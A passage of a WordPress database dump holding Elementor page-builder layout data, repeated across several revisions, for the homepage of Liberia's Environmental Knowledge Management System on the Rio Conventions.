",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5753,508,'_elementor_version','2.7.5'),(5754,508,'_elementor_template_type','wp-page'),(5757,509,'_wp_page_template','default'),(5758,509,'_elementor_edit_mode','builder'),(5759,509,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4de34e\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"08ca173\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"660b9f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"18eb3ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(5760,509,'_elementor_version','2.7.5'),(5761,509,'_elementor_template_type','wp-page'),(5769,511,'_wp_page_template','default'),(5770,511,'_elementor_edit_mode','builder'),(5771,511,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 